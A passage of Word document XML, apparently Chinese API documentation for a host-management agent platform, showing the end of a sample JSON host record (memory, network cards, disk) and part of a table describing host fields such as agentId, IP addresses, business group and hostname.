      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemLoad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "memories": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "type": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "producer": "Not Specified",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "size": 980,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "speed": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "description": "0.96GB(Not Specified null 0MHZ)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>producerSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2048,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "bank": "Not Specified 2.0GB 0MHZ"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "manufacturer": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>productName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serialNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>networkCards</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "eth0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "mac": "00:50:56:36:35:bb",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv4": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv6": "fe80::250:56ff:fe36:35bb",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "gateway": "192.168.78.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dnsServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "yes"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "netmask": "255.255.255.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "broadcast": "192.168.78.255",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": "1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "speed": 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "lo",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "mac": "00:00:00:00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv4": "127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv6": "::1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "gateway": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dnsServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "192.168.78.2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "netmask": "255.255.255.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "broadcast": "192.168.78.255",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "status": "1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "speed": 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>diskSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 51200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>diskUsage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0.6096,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>diskCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78668D"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2110"/>
        <w:gridCol w:w="1026"/>
        <w:gridCol w:w="3739"/>
        <w:gridCol w:w="3207"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FB6135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C02F26F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="081B638B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DC68F75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="657A4BAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B6009FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27102B13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32513C2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="717DDCF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0491E08C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D1EF9C9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6C126A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730B4EBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D88786" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D3D1A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36CA2301" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2861999E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="434F1724" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C37AAA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E99A135" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E26F489" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03ADB269" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A21FD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BAC4FB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7A62A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7046F487" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77800621" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05782271" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CCE05AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36BC48F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="749DE043" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D1FDAF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A206D14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49058463" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73B4A7FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7CAC6EF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B169A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2EA9CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4534BC31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13248FC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71DCECBB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E29602D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="145BA0F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A3A54D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD53EF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1221D9A2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4372B6D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DC7DEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FD75BDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EC0FAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EED8EE3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A6CC68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14FC803C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35D03818" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1004B056" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0ACB4A27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A8F646C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>proxyIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0C416E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1336C34C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36EF0623" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代理</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="390D19FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33E8810D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79ABA31D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="489D961B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60946C56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DECB55F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
